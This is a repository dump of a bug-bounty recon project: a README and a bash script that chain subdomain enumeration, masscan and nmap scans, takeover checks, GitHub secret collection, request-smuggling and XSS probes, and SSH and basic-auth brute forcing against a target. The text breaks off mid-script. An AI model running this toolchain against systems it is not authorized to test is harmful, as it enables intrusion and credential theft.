├── Flow.png ├── README.md ├── scanner.sh └── tools ├── .creds ├── .tokens ├── apps.json ├── fingerprints.json ├── nameservers.txt ├── nmap-bootstrap.xsl └── providers-data.csv /Flow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xspade/Automated-Scanner/089a6ac6555f7ff22bf3d18403db17e8190acf23/Flow.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![Follow on Twitter](https://img.shields.io/twitter/follow/0xspade.svg?logo=twitter)](https://twitter.com/0xpsade) 2 | [![Follow on Twitter](https://img.shields.io/twitter/follow/sumgr0.svg?logo=twitter)](https://twitter.com/sumgr0) 3 | 4 | # Installation 5 | For the installation of all the tools below. I linked all the github links, just make sure that its in the right directory PATH and your good to go. feel free to modify and feel free not to use it if you don't like it :) 6 | 7 | **ALL CREDIT GOES TO AMAZING CREATORS OF THIS WONDERFUL TOOLS :)** 8 | 9 | cannot make to mention y'all co'z i'm too lazy to do that though :D (i'm being honest here) 10 | ## List of tools to be installed 11 | 12 | golang 13 | - amass 14 | - subfinder 15 | - assetfinder 16 | - zcat 17 | - goaltdns 18 | - shuffledns 19 | - dnsprobe 20 | - ffuf 21 | - httprobe 22 | - tko-subs 23 | - subjack 24 | - zdns 25 | - aquatone 26 | - webanalyze 27 | - gau 28 | - getching 29 | - kxss 30 | - dalfox 31 | 32 | APT-GET 33 | - jq 34 | - grepcidr 35 | - nmap 36 | - masscan 37 | - brutespray 38 | 39 | Download Only 40 | - findomain 41 | - github-endpoints 42 | - github-secrets 43 | - smuggler 44 | 45 | GIT 46 | - massdns 47 | - S3Scanner 48 | - LinkFinder 49 | - defparam smuggler 50 | 51 | PIP 52 | - shodan 53 | 54 | # How to use 55 | 56 | Usage: `~$ bash scanner.sh example.com` 57 | 58 | Running in background in VPS using nohup 59 | 60 | Usage: `~$ nohup bash scanner.sh example.com &> example.out&` 61 | 62 | 63 | ### Need a Digitalocean? 64 | 65 | Free $100 in DigitalOcean, just click the link below :D 66 | 67 | [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=9d633afb889b&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) 68 | 69 | ## Contributor 70 | 71 | Big thanks to [@sumgr0](https://twitter.com/sumgr0) :) 72 | 73 | ## Links 74 | 75 | ---- 76 | **Subdomain Enumeration** 77 | * [Amass](https://github.com/OWASP/Amass) brute with [wordlist](https://github.com/ZephrFish/Wordlists/blob/master/HugeDNS.7z) 78 | * [Findomain](https://github.com/Edu4rdSHL/findomain) 79 | * [Subfinder](https://github.com/subfinder/subfinder) 80 | * [Assetfinder](https://github.com/tomnomnom/assetfinder) 81 | * [Rapid7's Project Sonar](https://opendata.rapid7.com/sonar.fdns_v2/) 82 | >https://github.com/phspade/Project_Sonar_R7 83 | * [goaltdns](https://github.com/subfinder/goaltdns) + [massdns](https://github.com/blechschmidt/massdns) 84 | 85 | **Scan All Alive Hosts with [Httprobe](https://github.com/tomnomnom/httprobe)** 86 | 87 | * Getting All IP from the subdomains collected with [DNSProbe](https://github.com/projectdiscovery/dnsprobe) 88 | 89 | **Separating Cloudflare, Incapsula, Sucuri, and Akamai IPs from collected IPs** 90 | >It's useless to scan Cloudflare, Incapsula, Sucuri, and Akamai IPs. *(Just like talking to a wall)* 91 | > 92 | >FYI, Install grepcidr first `apt-get install grepcidr` 93 | 94 | * S3 Bucket scanner with [s3scanner](https://github.com/sa7mon/S3Scanner) 95 | 96 | **Subdomain TakeOver** 97 | * [tko-subs](https://github.com/anshumanbh/tko-subs) 98 | * [Subjack](https://github.com/haccer/subjack) 99 | 100 | **Collecting Endpoints thru [Linkfinder](https://github.com/GerbenJavado/LinkFinder/)** 101 | 102 | **Collecting [Endpoints](https://github.com/gwen001/github-search/blob/master/github-endpoints.py) and [Secrets](https://github.com/gwen001/github-search/blob/master/github-secrets.py) in Github** 103 | >make sure to create `.tokens` file *(containing your github token)* together with `github-endpoints.py` and `github-secrets.py` *(probably in ~/tools folder)*. 104 | 105 | **[HTTP Request Smuggler](https://github.com/gwen001/pentest-tools/blob/master/smuggler.py)** 106 | 107 | **[ZDNS](https://github.com/zmap/zdns)** 108 | 109 | **[Shodan](https://cli.shodan.io/)** 110 | 111 | **[Aquatone](https://github.com/michenriksen/aquatone)** 112 | 113 | **Port Scanning** 114 | * NMAP 115 | * masscan 116 | 117 | **[Webanalyze](https://github.com/rverton/webanalyze) for Fingerprinting assets** 118 | 119 | **File/Dir Discovery** 120 | * [gau](https://github.com/lc/gau) + [getching](https://github.com/phspade/getching) 121 | 122 | **Potential XSS** 123 | * [kxss](https://github.com/tomnomnom/hacks/tree/master/kxss) 124 | 125 | * [dalfox](https://github.com/hahwul/dalfox) 126 | 127 | **[Virtual Hosts](https://github.com/ffuf/ffuf) Scan** 128 | 129 | * 401 Basic Authorization Bruteforce with FFUF 130 | >Some subdomains has 401 authentication basic, so we need to bruteforce it with base64 credentials :) 131 | 132 | * [FFUF](https://github.com/ffuf/ffuf) 133 | 134 | >Added **X-Forwarded-For Header** *(you should [setup your own dns server](https://medium.com/@spade.com/a-noob-guide-to-setup-your-own-oob-dns-server-870d9e05b54a))* to check for IP Spoofing Attack. 135 | 136 | Feel free to modify it on your own if you don't feel about on how it works :) 137 | 138 | -------------------------------------------------------------------------------- /scanner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | passwordx=$(cat ~/tools/.creds | grep password | awk {'print $3'}) 4 | dns_server=$(cat ~/tools/.creds | grep 'dns_server' | awk {'print $3'}) 5 | xss_hunter=$(cat ~/tools/.creds | grep 'xss_hunter' | awk {'print $3'}) 6 | 7 | [ ! -f ~/recon ] && mkdir ~/recon 2&>1 8 | [ ! -f ~/recon/$1 ] && mkdir ~/recon/$1 2&>1 9 | [ ! -f ~/recon/$1/webanalyze ] && mkdir ~/recon/$1/webanalyze 2&>1 10 | [ ! -f ~/recon/$1/aquatone ] && mkdir ~/recon/$1/aquatone 2&>1 11 | [ ! -f ~/recon/$1/shodan ] && mkdir ~/recon/$1/shodan 2&>1 12 | [ ! -f ~/recon/$1/dirsearch ] && mkdir ~/recon/$1/dirsearch 2&>1 13 | [ ! -f ~/recon/$1/virtual-hosts ] && mkdir ~/recon/$1/virtual-hosts 2&>1 14 | [ ! -f ~/recon/$1/endpoints ] && mkdir ~/recon/$1/endpoints 2&>1 15 | [ ! -f ~/recon/$1/github-endpoints ] && mkdir ~/recon/$1/github-endpoints 2&>1 16 | [ ! -f ~/recon/$1/github-secrets ] && mkdir ~/recon/$1/github-secrets 2&>1 17 | [ ! -f ~/recon/$1/gau ] && mkdir ~/recon/$1/gau 2&>1 18 | [ ! -f ~/recon/$1/kxss ] && mkdir ~/recon/$1/kxss 2&>1 19 | [ ! -f ~/recon/$1/http-desync ] && mkdir ~/recon/$1/http-desync 2&>1 20 | [ ! -f ~/recon/$1/401 ] && mkdir ~/recon/$1/401 2&>1 21 | sleep 5 22 | 23 | folder=$1 24 | 25 | message () { 26 | telegram_bot=$(cat ~/tools/.creds | grep "telegram_bot" | awk {'print $3'}) 27 | telegram_id=$(cat ~/tools/.creds | grep "telegram_id" | awk {'print $3'}) 28 | alert="https://api.telegram.org/bot$telegram_bot/sendmessage?chat_id=$telegram_id&text=" 29 | [ -z $telegram_bot ] && [ -z $telegram_id ] || curl -g $alert$1 --silent > /dev/null 30 | } 31 | 32 | scanned () { 33 | cat $1 | sort -u | wc -l 34 | } 35 | 36 | message "[%2B]%20Initiating%20scan%20%3A%20$1%20[%2B]" 37 | date 38 | 39 | [ ! -f ~/tools/nameservers.txt ] && wget https://public-dns.info/nameservers.txt -O ~/tools/nameservers.txt 40 | 41 | if [ ! -f ~/recon/$1/$1-final.txt ]; then 42 | echo "[+] AMASS SCANNING [+]" 43 | if [ ! -f ~/recon/$1/$1-amass.txt ] && [ ! -z $(which amass) ]; then 44 | amass enum -brute -w ~/tools/EnormousDNS.txt -rf ~/tools/nameservers.txt -d $1 -o ~/recon/$1/$1-amass.txt 45 | amasscan=$(scanned ~/recon/$1/$1-amass.txt) 46 | message "Amass%20Found%20$amasscan%20subdomain(s)%20for%20$1" 47 | echo "[+] Amass Found $amasscan subdomains" 48 | else 49 | message "[-]%20Skipping%20Amass%20Scanning%20for%20$1" 50 | echo "[!] Skipping ..." 51 | fi 52 | sleep 5 53 | 54 | echo "[+] FINDOMAIN SCANNING [+]" 55 | if [ ! -f ~/recon/$1/$1-findomain.txt ] && [ ! -z $(which findomain) ]; then 56 | findomain -t $1 -q -u ~/recon/$1/$1-findomain.txt 57 | findomainscan=$(scanned ~/recon/$1/$1-findomain.txt) 58 | message "Findomain%20Found%20$findomainscan%20subdomain(s)%20for%20$1" 59 | echo "[+] Findomain Found $findomainscan subdomains" 60 | else 61 | message "[-]%20Skipping%20Findomain%20$findomainscan%20previously%20discovered%20for%20$1" 62 | echo "[!] Skipping ..." 63 | fi 64 | sleep 5 65 | 66 | echo "[+] SUBFINDER SCANNING [+]" 67 | if [ ! -f ~/recon/$1/$1-subfinder.txt ] && [ ! -z $(which subfinder) ]; then 68 | subfinder -d $1 -nW -silent -rL ~/tools/nameservers.txt -o ~/recon/$1/$1-subfinder.txt 69 | subfinderscan=$(scanned ~/recon/$1/$1-subfinder.txt) 70 | message "SubFinder%20Found%20$subfinderscan%20subdomain(s)%20for%20$1" 71 | echo "[+] Subfinder Found $subfinderscan subdomains" 72 | else 73 | message "[-]%20Skipping%20Subfinder%20Scanning%20for%20$1" 74 | echo "[!] Skipping ..." 75 | fi 76 | sleep 5 77 | 78 | echo "[+] ASSETFINDER SCANNING [+]" 79 | if [ ! -f ~/recon/$1/$1-assetfinder.txt ] && [ ! -z $(which assetfinder) ]; then 80 | assetfinder -subs-only $1 > ~/recon/$1/$1-assetfinder.txt 81 | assetfinderscan=$(scanned ~/recon/$1/$1-assetfinder.txt) 82 | message "Assetfinder%20Found%20$assetfinderscan%20subdomain(s)%20for%20$1" 83 | echo "[+] Assetfinder Found $assetfinderscan subdomains" 84 | else 85 | message "[-]%20Skipping%20Assetfinder%20Scanning%20for%20$1" 86 | echo "[!] Skipping ..." 87 | fi 88 | sleep 5 89 | 90 | echo "[+] SCANNING SUBDOMAINS WITH PROJECT SONAR [+]" 91 | if [ ! -f ~/recon/$1/$1-project-sonar.txt ] && [ -e ~/tools/forward_dns.any.json.gz ]; then 92 | zcat ~/tools/forward_dns.any.json.gz | grep -E "\.$1\"," | jq -r '.name' | sort -u >> ~/recon/$1/$1-project-sonar.txt 93 | projectsonar=$(scanned ~/recon/$1/$1-project-sonar.txt) 94 | message "Project%20Sonar%20Found%20$projectsonar%20subdomain(s)%20for%20$1" 95 | echo "[+] Project Sonar Found $projectsonar subdomains" 96 | else 97 | message "[-]%20Skipping%20Project%20Sonar%20Scanning%20for%20$1" 98 | echo "[!] Skipping ..." 99 | fi 100 | sleep 5 101 | 102 | ## Deleting all the results to less disk usage 103 | cat ~/recon/$1/$1-amass.txt ~/recon/$1/$1-project-sonar.txt ~/recon/$1/$1-findomain.txt ~/recon/$1/$1-subfinder.txt ~/recon/$1/$1-assetfinder.txt | sort -uf > ~/recon/$1/$1-final.txt 104 | rm ~/recon/$1/$1-amass.txt ~/recon/$1/$1-project-sonar.txt ~/recon/$1/$1-findomain.txt ~/recon/$1/$1-subfinder.txt ~/recon/$1/$1-assetfinder.txt 105 | sleep 5 106 | 107 | fi 108 | 109 | if [ ! -f ~/recon/$1/$1-final.txt ]; then 110 | exit 1 111 | fi 112 | 113 | echo "[+] GOALTDNS SUBDOMAIN PERMUTATION [+]" 114 | if [ ! -f ~/recon/$1/$1-goaltdns.txt ] && [ ! -z $(which goaltdns) ]; then 115 | goaltdns -l ~/recon/$1/$1-final.txt -w ~/tools/subs.txt | massdns -r ~/tools/nameservers.txt -o J --flush 2>/dev/null | jq -r '.name' >> ~/recon/$1/$1-goaltdns.tmp 116 | cat ~/recon/$1/$1-goaltdns.tmp | sed 's/\.$//g' | sort -u >> ~/recon/$1/$1-goaltdns.txt 117 | rm ~/recon/$1/$1-goaltdns.tmp 118 | goaltdns=$(scanned ~/recon/$1/$1-goaltdns.txt) 119 | message "goaltdns%20generates%20$goaltdns%20subdomain(s)%20for%20$1" 120 | echo "[+] goaltdns generate $goaltdns subdomains" 121 | else 122 | message "[-]%20Skipping%20goaltdns%20Scanning%20for%20$1" 123 | echo "[!] Skipping ..." 124 | fi 125 | sleep 5 126 | 127 | echo "[+] ELIMINATING WILDCARD SUBDOMAINS [+]" 128 | if [ ! -f ~/recon/$1/$1-non-wildcards.txt ] && [ ! -z $(which shuffledns) ] && [ ! -z $(which dnsprobe) ]; then 129 | cat ~/recon/$1/$1-goaltdns.txt ~/recon/$1/$1-final.txt | sed 's/\.$//g' | shuffledns -d $1 -r ~/tools/nameservers.txt | dnsprobe -r A | awk {'print $1'} | sort -u >> ~/recon/$1/$1-non-wildcards.txt 130 | rm ~/recon/$1/$1-final.txt && mv ~/recon/$1/$1-non-wildcards.txt ~/recon/$1/$1-final.txt 131 | message "Done%20Eliminating%20wildcard%20subdomains!" 132 | else 133 | message "[-]%20Skipping%20shuffledns%20and%20dnsprobe%20Scanning%20for%20$1" 134 | echo "[!] Skipping ..." 135 | fi 136 | sleep 5 137 | 138 | all=$(scanned ~/recon/$1/$1-final.txt) 139 | message "Almost%20$all%20Collected%20Subdomains%20for%20$1" 140 | echo "[+] $all collected subdomains" 141 | sleep 3 142 | 143 | # collecting all IP from collected subdomains 144 | echo "[+] Getting all IP from subdomains [+]" 145 | if [ ! -f ~/recon/$1/$1-ipz.txt ] && [ ! -z $(which dnsprobe) ]; then 146 | cat ~/recon/$1/$1-final.txt | dnsprobe | awk {'print $2'} | sort -u > ~/recon/$1/$1-ipz.txt 147 | rm ~/recon/$1/$1-goaltdns.txt 148 | ipcount=$(scanned ~/recon/$1/$1-ipz.txt) 149 | message "Almost%20$ipcount%20IP%20Collected%20in%20$1" 150 | echo "[+] $all collected IP" 151 | else 152 | message "[-]%20Skipping%20dnsprobe%20Scanning%20for%20$1" 153 | echo "[!] Skipping ..." 154 | fi 155 | 156 | ## segregating cloudflare IP from non-cloudflare IP 157 | ## non-sense if I scan cloudflare,sucuri,akamai and incapsula IP. :( 158 | iprange="173.245.48.0/20 103.21.244.0/22 103.22.200.0/22 103.31.4.0/22 141.101.64.0/18 108.162.192.0/18 190.93.240.0/20 188.114.96.0/20 197.234.240.0/22 198.41.128.0/17 162.158.0.0/15 104.16.0.0/12 172.64.0.0/13 131.0.72.0/22" 159 | for ip in $(cat ~/recon/$1/$1-ipz.txt); do 160 | grepcidr "$iprange" <(echo "$ip") >/dev/null && echo "[!] $ip is cloudflare" || echo "$ip" >> ~/recon/$1/$1-ip4.txt 161 | done 162 | ipz=$(scanned ~/recon/$1/$1-ip4.txt) 163 | ip_old=$(scanned ~/recon/$1/$1-ipz.txt) 164 | message "$ipz%20non-cloudflare%20IPs%20has%20been%20$collected%20in%20$1%20out%20of%20$ip_old%20IPs" 165 | echo "[+] $ipz non-cloudflare IPs has been collected out of $ip_old IPs!" 166 | rm ~/recon/$1/$1-ipz.txt 167 | sleep 5 168 | 169 | incapsula="199.83.128.0/21 198.143.32.0/19 149.126.72.0/21 103.28.248.0/22 45.64.64.0/22 185.11.124.0/22 192.230.64.0/18 107.154.0.0/16 45.60.0.0/16 45.223.0.0/16" 170 | for ip in $(cat ~/recon/$1/$1-ip4.txt); do 171 | grepcidr "$incapsula" <(echo "$ip") >/dev/null && echo "[!] $ip is Incapsula" || echo "$ip" >> ~/recon/$1/$1-ip3.txt 172 | done 173 | ipz=$(scanned ~/recon/$1/$1-ip3.txt) 174 | ip_old=$(scanned ~/recon/$1/$1-ip4.txt) 175 | message "$ipz%20non-incapsula%20IPs%20has%20been%20$collected%20in%20$1%20out%20of%20$ip_old%20IPs" 176 | echo "[+] $ipz non-incapsula IPs has been collected out of $ip_old IPs!" 177 | rm ~/recon/$1/$1-ip4.txt 178 | sleep 5 179 | 180 | sucuri="185.93.228.0/24 185.93.229.0/24 185.93.230.0/24 185.93.231.0/24 192.124.249.0/24 192.161.0.0/24 192.88.134.0/24 192.88.135.0/24 193.19.224.0/24 193.19.225.0/24 66.248.200.0/24 66.248.201.0/24 66.248.202.0/24 66.248.203.0/24" 181 | for ip in $(cat ~/recon/$1/$1-ip3.txt); do 182 | grepcidr "$sucuri" <(echo "$ip") >/dev/null && echo "[!] $ip is Sucuri" || echo "$ip" >> ~/recon/$1/$1-ip2.txt 183 | done 184 | ipz=$(scanned ~/recon/$1/$1-ip2.txt) 185 | ip_old=$(scanned ~/recon/$1/$1-ip3.txt) 186 | message "$ipz%20non-sucuri%20IPs%20has%20been%20$collected%20in%20$1%20out%20of%20$ip_old%20IPs" 187 | echo "[+] $ipz non-sucuri IPs has been collected out of $ip_old IPs!" 188 | rm ~/recon/$1/$1-ip3.txt 189 | sleep 5 190 | 191 | akamai="104.101.221.0/24 184.51.125.0/24 184.51.154.0/24 184.51.157.0/24 184.51.33.0/24 2.16.36.0/24 2.16.37.0/24 2.22.226.0/24 2.22.227.0/24 2.22.60.0/24 23.15.12.0/24 23.15.13.0/24 23.209.105.0/24 23.62.225.0/24 23.74.29.0/24 23.79.224.0/24 23.79.225.0/24 23.79.226.0/24 23.79.227.0/24 23.79.229.0/24 23.79.230.0/24 23.79.231.0/24 23.79.232.0/24 23.79.233.0/24 23.79.235.0/24 23.79.237.0/24 23.79.238.0/24 23.79.239.0/24 63.208.195.0/24 72.246.0.0/24 72.246.1.0/24 72.246.116.0/24 72.246.199.0/24 72.246.2.0/24 72.247.150.0/24 72.247.151.0/24 72.247.216.0/24 72.247.44.0/24 72.247.45.0/24 80.67.64.0/24 80.67.65.0/24 80.67.70.0/24 80.67.73.0/24 88.221.208.0/24 88.221.209.0/24 96.6.114.0/24" 192 | for ip in $(cat ~/recon/$1/$1-ip2.txt); do 193 | grepcidr "$akamai" <(echo "$ip") >/dev/null && echo "[!] $ip is Akamai" || echo "$ip" >> ~/recon/$1/$1-ip.txt 194 | done 195 | ipz=$(scanned ~/recon/$1/$1-ip.txt) 196 | ip_old=$(scanned ~/recon/$1/$1-ip2.txt) 197 | message "$ipz%20non-akamai%20IPs%20has%20been%20$collected%20in%20$1%20out%20of%20$ip_old%20IPs" 198 | echo "[+] $ipz non-akamai IPs has been collected out of $ip_old IPs!" 199 | rm ~/recon/$1/$1-ip2.txt 200 | sleep 5 201 | 202 | echo "[+] MASSCAN PORT SCANNING [+]" 203 | if [ ! -f ~/recon/$1/$1-masscan.txt ] && [ ! -z $(which masscan) ]; then 204 | echo $passwordx | sudo -S masscan -p0-65535 -iL ~/recon/$1/$1-ip.txt --max-rate 1000 -oG ~/recon/$1/$1-masscan.txt 205 | mass=$(cat ~/recon/$1/$1-masscan.txt | grep "Host:" | awk {'print $5'} | awk -F '/' {'print $1'} | sort -u | wc -l) 206 | message "Masscan%20discovered%20$mass%20open%20port(s)%20for%20$1" 207 | echo "[+] Done masscan for scanning port(s)" 208 | else 209 | message "[-]%20Skipping%20Masscan%20Scanning%20for%20$1" 210 | echo "[!] Skipping ..." 211 | fi 212 | sleep 5 213 | 214 | big_ports=$(cat ~/recon/$1/$1-masscan.txt | grep "Host:" | awk {'print $5'} | awk -F '/' {'print $1'} | sort -u | paste -s -d ',') 215 | cat ~/recon/$1/$1-masscan.txt | grep "Host:" | awk {'print $2":"$5'} | awk -F '/' {'print $1'} | sed 's/:80$//g' | sed 's/:443$//g' | sort -u > ~/recon/$1/$1-open-ports.txt 216 | cat ~/recon/$1/$1-open-ports.txt ~/recon/$1/$1-final.txt > ~/recon/$1/$1-all.txt 217 | 218 | echo "[+] HTTProbe Scanning Alive Hosts [+]" 219 | if [ ! -f ~/recon/$1/$1-httprobe.txt ] && [ ! -z $(which httprobe) ]; then 220 | cat ~/recon/$1/$1-all.txt | httprobe -c 100 >> ~/recon/$1/$1-httprobe.txt 221 | alivesu=$(scanned ~/recon/$1/$1-httprobe.txt) 222 | message "$alivesu%20alive%20domains%20out%20of%20$all%20domains%20in%20$1" 223 | echo "[+] $alivesu alive domains out of $all domains/IPs using httprobe" 224 | else 225 | message "[-]%20Skipping%20httprobe%20Scanning%20for%20$1" 226 | echo "[!] Skipping ..." 227 | fi 228 | sleep 5 229 | 230 | cat ~/recon/$1/$1-httprobe.txt | sed 's/http\(.?*\)*:\/\///g' | sort -u > ~/recon/$1/$1-alive.txt 231 | 232 | echo "[+] S3 Bucket Scanner [+]" 233 | if [ -f ~/tools/S3Scanner/s3scanner.py ]; then 234 | python ~/tools/S3Scanner/s3scanner.py ~/recon/$1/$1-alive.txt &> ~/recon/$1/$1-s3scanner.txt 235 | esthree=$(cat ~/recon/$1/$1-s3scanner.txt | grep "\[found\]" | wc -l) 236 | message "S3Scanner%20found%20$esthree%20buckets%20for%20$1" 237 | echo "[+] Done s3scanner for $1" 238 | else 239 | message "[-]%20Skipping%20s3scanner%20Scanning%20for%20$1" 240 | echo "[!] Skipping ..." 241 | fi 242 | 243 | echo "[+] TKO-SUBS for Subdomain TKO [+]" 244 | if [ ! -f ~/recon/$1/$1-tkosubs.txt ] && [ ! -z $(which tko-subs) ]; then 245 | [ ! -f ~/tools/providers-data.csv ] && wget "https://raw.githubusercontent.com/anshumanbh/tko-subs/master/providers-data.csv" -O ~/tools/providers-data.csv 246 | tko-subs -domains=recon/$1/$1-alive.txt -data=tools/providers-data.csv -output=recon/$1/$1-tkosubs.txt 247 | message "TKO-Subs%20scanner%20done%20for%20$1" 248 | echo "[+] TKO-Subs scanner is done" 249 | else 250 | message "[-]%20Skipping%20tko-subs%20Scanning%20for%20$1" 251 | echo "[!] Skipping ..." 252 | fi 253 | sleep 5 254 | 255 | echo "[+] SUBJACK for Subdomain TKO [+]" 256 | if [ ! -f ~/recon/$1/$1-subjack.txt ] && [ ! -z $(which subjack) ]; then 257 | [ ! -f ~/tools/fingerprints.json ] && wget "https://raw.githubusercontent.com/haccer/subjack/master/fingerprints.json" -O ~/tools/fingerprints.json 258 | subjack -w ~/recon/$1/$1-alive.txt -a -timeout 15 -c ~/tools/fingerprints.json -v -m -o ~/recon/$1/$1-subtemp.txt 259 | subjack -w ~/recon/$1/$1-alive.txt -a -timeout 15 -c ~/tools/fingerprints.json -v -m -ssl -o ~/recon/$1/$1-subtmp.txt 260 | cat ~/recon/$1/$1-subtemp.txt ~/recon/$1/$1-subtmp.txt | sort -u > ~/recon/$1/$1-subjack.txt 261 | rm ~/recon/$1/$1-subtemp.txt ~/recon/$1/$1-subtmp.txt 262 | message "subjack%20scanner%20done%20for%20$1" 263 | echo "[+] Subjack scanner is done" 264 | else 265 | message "[-]%20Skipping%20subjack%20Scanning%20for%20$1" 266 | echo "[!] Skipping ..." 267 | fi 268 | sleep 5 269 | 270 | echo "[+] COLLECTING ENDPOINTS [+]" 271 | if [ -f ~/tools/LinkFinder/linkfinder.py ]; then 272 | for urlz in $(cat ~/recon/$1/$1-httprobe.txt); do 273 | filename=$(echo $urlz | sed 's/http:\/\///g' | sed 's/https:\/\//ssl-/g') 274 | link=$(python ~/tools/LinkFinder/linkfinder.py -i $urlz -d -o cli | grep -E "*.js$" | grep "$1" | grep "Running against:" |awk {'print $3'}) 275 | echo "Running against: $urlz" 276 | if [[ ! -z $link ]]; then 277 | for linx in $link; do 278 | python ~/tools/LinkFinder/linkfinder.py -i $linx -o cli > ~/recon/$1/endpoints/$filename-result.txt 279 | done 280 | else 281 | python ~/tools/LinkFinder/linkfinder.py -i $urlz -d -o cli > ~/recon/$1/endpoints/$filename-result.txt 282 | fi 283 | done 284 | message "Done%20collecting%20endpoint%20in%20$1" 285 | echo "[+] Done collecting endpoint" 286 | else 287 | message "[-]%20Skipping%20linkfinder%20Scanning%20for%20$1" 288 | echo "[!] Skipping ..." 289 | fi 290 | sleep 5 291 | 292 | echo "[+] COLLECTING ENDPOINTS FROM GITHUB [+]" 293 | if [ -e ~/tools/.tokens ] && [ -f ~/tools/.tokens ] && [ -f ~/tools/github-endpoints.py ]; then 294 | for url in $(cat ~/recon/$1/$1-alive.txt); do 295 | echo "Running against: $url" 296 | python3 ~/tools/github-endpoints.py -d $url -s -r -t $(cat ~/tools/.tokens) > ~/recon/$1/github-endpoints/$url.txt 297 | sleep 7 298 | done 299 | message "Done%20collecting%20github%20endpoint%20in%20$1" 300 | echo "[+] Done collecting github endpoint" 301 | else 302 | message "Skipping%20github-endpoint%20script%20in%20$1" 303 | echo "[!] Skipping ..." 304 | fi 305 | sleep 5 306 | 307 | echo "[+] COLLECTING SECRETS FROM GITHUB [+]" 308 | if [ -e ~/tools/.tokens ] && [ -f ~/tools/.tokens ] && [ -f ~/tools/github-secrets.py ]; then 309 | for url in $(cat ~/recon/$1/$1-alive.txt ); do 310 | u=$(echo $url | sed 's/\./\\./g'); 311 | echo "Running against: $url" 312 | python3 ~/tools/github-secrets.py -s $u -t $(cat ~/tools/.tokens) > ~/recon/$1/github-secrets/$url.txt 313 | sleep 7 314 | done 315 | message "Done%20collecting%20github%20secrets%20in%20$1" 316 | echo "[+] Done collecting github secrets" 317 | else 318 | message "Skipping%20github-secrets%20script%20in%20$1" 319 | echo "[!] Skipping ..." 320 | fi 321 | sleep 5 322 | 323 | echo "[+] HTTP SMUGGLING SCANNING [+]" 324 | if [ -f ~/tools/smuggler.py ]; then 325 | for url in $(cat ~/recon/$1/$1-httprobe.txt); do 326 | filename=$(echo $url | sed 's/http:\/\///g' | sed 's/https:\/\//ssl-/g') 327 | echo "Running against: $url" 328 | python3 ~/tools/smuggler.py -u "$url/" -v 1 &> ~/recon/$1/http-desync/$filename.txt 329 | done 330 | message "Done%20scanning%20of%20request%20smuggling%20in%20$1" 331 | echo "[+] Done scanning of request smuggling" 332 | else 333 | message "Skipping%20scanning%20of%20request%20smuggling%20in%20$1" 334 | echo "[!] Skipping ..." 335 | fi 336 | sleep 5 337 | 338 | echo "[+] ZDNS SCANNING [+]" 339 | if [ ! -z $(which zdns) ]; then 340 | for i in $(cat ~/recon/$1/$1-alive.txt);do echo $i | zdns ANY -output-file - | jq -r '"Name: "+.name+"\t\t Protocol: "+.data.protocol+"\t Resolver: "+.data.resolver+"\t Status: "+.status' >> ~/recon/$1/$1-zdns.txt;done 341 | message "Done%20ZDNS%20Scanning%20for%20$1" 342 | echo "[+] Done ZDNS for scanning assets" 343 | else 344 | message "Skipping%20scanning%20of%20ZDNS%20in%20$1" 345 | echo "[!] Skipping ..." 346 | fi 347 | sleep 5 348 | 349 | echo "[+] SHODAN HOST SCANNING [+]" 350 | if [ ! -z $(which shodan) ]; then 351 | for ip in $(cat ~/recon/$1/$1-ip.txt); do filename=$(echo $ip | sed 's/\./_/g');shodan host $ip > ~/recon/$1/shodan/$filename.txt; done 352 | message "Done%20Shodan%20for%20$1" 353 | echo "[+] Done shodan" 354 | else 355 | message "[-]%20Skipping%20Shodan%20for%20$1" 356 | echo "[!] Skipping ..." 357 | fi 358 | sleep 5 359 | 360 | echo "[+] AQUATONE SCREENSHOT [+]" 361 | if [ ! -z $(which aquatone) ]; then 362 | cat ~/recon/$1/$1-httprobe.txt | aquatone -ports $big_ports -out ~/recon/$1/aquatone 363 | message "Done%20Aquatone%20for%20Screenshot%20for%20$1" 364 | echo "[+] Done aquatone for screenshot of Alive assets" 365 | else 366 | message "[-]%20Skipping%20Aquatone%20Screenshot%20for%20$1" 367 | echo "[!] Skipping ..." 368 | fi 369 | sleep 5 370 | 371 | echo "[+] NMAP PORT SCANNING [+]" 372 | if [ ! -f ~/recon/$1/$1-nmap.txt ] && [ ! -z $(which nmap) ]; then 373 | [ ! -f ~/tools/nmap-bootstrap.xsl ] && wget "https://raw.githubusercontent.com/honze-net/nmap-bootstrap-xsl/master/nmap-bootstrap.xsl" -O ~/tools/nmap-bootstrap.xsl 374 | echo $passwordx | sudo -S nmap -sSVC -A -O -Pn -p$big_ports -iL ~/recon/$1/$1-ip.txt --script http-enum,http-title,ssh-brute --stylesheet ~/tools/nmap-bootstrap.xsl -oA ~/recon/$1/$1-nmap 375 | nmaps=$(scanned ~/recon/$1/$1-ip.txt) 376 | xsltproc -o ~/recon/$1/$1-nmap.html ~/tools/nmap-bootstrap.xsl ~/recon/$1/$1-nmap.xml 377 | message "Nmap%20Scanned%20$nmaps%20IPs%20for%20$1" 378 | echo "[+] Done nmap for scanning IPs" 379 | else 380 | message "[-]%20Skipping%20Nmap%20Scanning%20for%20$1" 381 | echo "[!] Skipping ..." 382 | fi 383 | sleep 5 384 | 385 | echo "[+] WEBANALYZE SCANNING FOR FINGERPRINTING [+]" 386 | if [ ! -z $(which webanalyze) ]; then 387 | [ ! -f ~/tools/apps.json ] && wget "https://raw.githubusercontent.com/AliasIO/Wappalyzer/master/src/apps.json" -O ~/tools/apps.json 388 | for target in $(cat ~/recon/$1/$1-httprobe.txt); do 389 | filename=$(echo $target | sed 's/http\(.?*\)*:\/\///g') 390 | webanalyze -host $target -apps ~/tools/apps.json -output csv > ~/recon/$1/webanalyze/$filename.txt 391 | sleep 5 392 | done 393 | message "Done%20webanalyze%20for%20fingerprinting%20$1" 394 | echo "[+] Done webanalyze for fingerprinting the assets!" 395 | else 396 | message "[-]%20Skipping%20webanalyze%20for%20fingerprinting%20$1" 397 | echo "[!] Skipping ..." 398 | fi 399 | sleep 5 400 | 401 | echo "[+] ALIENVAULT, WAYBACKURLS and COMMON CRAWL Scanning for Archived Endpoints [+]" 402 | if [ ! -z $(which gau) ]; then 403 | for u in $(cat ~/recon/$1/$1-alive.txt);do echo $u | gau | grep "$u" >> 